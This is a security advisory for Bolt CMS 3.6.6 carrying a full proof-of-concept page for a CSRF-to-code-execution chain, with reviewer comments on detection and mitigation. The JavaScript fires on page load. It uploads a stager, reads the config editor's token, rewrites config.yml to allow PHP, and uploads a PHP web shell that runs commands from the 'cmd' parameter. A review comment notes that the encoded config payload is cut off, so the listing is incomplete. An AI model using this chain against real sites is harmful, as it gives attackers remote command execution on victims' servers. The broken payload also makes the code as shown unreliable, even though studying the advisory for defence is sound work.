Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

2019.04.09
Credit: Felipe Gaspar
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- Advisory proof-of-concept, kept verbatim; only review comments were added.
     Defender's reading: this page is served from an attacker-controlled origin and relies on the
     victim's browser attaching the Bolt back-end session cookie to cross-site requests
     (xhr.withCredentials = true). The first request below, to /bolt/upload, carries no anti-CSRF
     token at all, whereas the later config.yml edit inside the stager does send file_edit[_token].
     Server-side controls that close this class of issue: require the CSRF token on the upload
     endpoint too, set the session cookie SameSite=Lax/Strict and validate Origin/Referer on
     state-changing requests, and never serve user uploads from the application origin as active
     content (.html). Stopping the stager at step one leaves the rest of the chain with nothing to run. -->
<html> <body> <script>history.pushState('', '', '/')</script> <script> /* Stage 1: a credentialed cross-site multipart POST to <target>/bolt/upload drops stager.html into the uploads area (the /files/YYYY-MM/ folder is guessed client-side in the setTimeout further down). Detection: POSTs to /bolt/upload whose Origin/Referer is not the site itself, and newly created .html files under the uploads directory. */ function exploit() { var target = "http://127.0.0.1" var bolt_admin_url = target + "/bolt"; var xhr = new XMLHttpRequest(); xhr.open("POST", bolt_admin_url + "/upload", true); xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159"); xhr.withCredentials = true; var body = "-----------------------------130713229751679908527494159\r\n" + "Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" + "Content-Type: text/plain\r\n" + "\r\n" + "\x3cscript\x3e\r\n" + "\r\n" + "function exploit(){\r\n" + "\r\n" + " var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" + "\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " \r\n" + " if(xhr) {\r\n" + " xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + " xhr.onreadystatechange = handler;\r\n" + " xhr.send();\r\n" + " }\r\n" + "\r\n" + " function handler(){\r\n" + " if (xhr.readyState == 4 && xhr.status == 200) {\r\n" + " user_page = document.createElement(\'html\');\r\n" + " user_page.innerHTML = xhr.responseText;\r\n" + " token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" + " console.log(\"Token obtained:\" + token_input);\r\n" + " ModifyAllowedExtensions(token_input);\r\n" + " UploadShell();\r\n" + " }\r\n" + " }\r\n" + "\r\n" + " function ModifyAllowedExtensions(token) {\r\n" + "\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + " xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + " xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + " xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" + " 
xhr.withCredentials = true;\r\n" + " var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+w
ith+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+chec
k+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+overri " var aBody = new Uint8Array(body.length);\r\n" + " for (var i = 0; i \x3c aBody.length; i++)\r\n" + " aBody[i] = body.charCodeAt(i); \r\n" + " xhr.send(new Blob([aBody]));\r\n" + " }\r\n" + "\r\n" + " function UploadShell() {\r\n" + " var xhr = new XMLHttpRequest();\r\n" + " xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" + " xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + " xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + " xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" + " xhr.withCredentials = true;\r\n" + " var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" + " \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" + " \"Content-Type: text/plain\\r\\n\" + \r\n" + " \"\\r\\n\" + \r\n" + " \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" + " \"\\r\\n\" + \r\n" + " \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" + " var aBody = new Uint8Array(body.length);\r\n" + " for (var i = 0; i \x3c aBody.length; i++)\r\n" + " aBody[i] = body.charCodeAt(i); \r\n" + " xhr.send(new Blob([aBody]));\r\n" + " }\r\n" + " }\r\n" + "\r\n" + " exploit();\r\n" + "\r\n" + "\x3c/script\x3e\r\n" + "\n" + "\r\n" + "-----------------------------130713229751679908527494159--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); /* Stage 2: after 2 s the uploaded stager.html is loaded in the hidden iframe; being served from the target origin it can read the config editor's _token and issue authenticated changes, which is why serving uploads as active content matters as much as the missing token. Detection: config.yml edits and .php files appearing under the uploads path from a session that is otherwise idle. NOTE(review): the url-encoded config.yml payload in ModifyAllowedExtensions is cut off on this page (the text ends at "overri " and jumps to " var aBody"), so the listing as shown is incomplete and does not parse; nothing has been reconstructed here. */ setTimeout(function() { var dateObj = new Date(); var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2)); document.getElementById('stager').src = target + "/files/"+folder+"/stager.html"; console.log("Called stager! 
Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami"); }, 2000); } /* Fires on page load, i.e. as soon as a visitor who is presumably still logged in to the Bolt back-end opens this page; no interaction is required. */ window.onload = function() { exploit(); }; </script> <iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe> </body> </html>

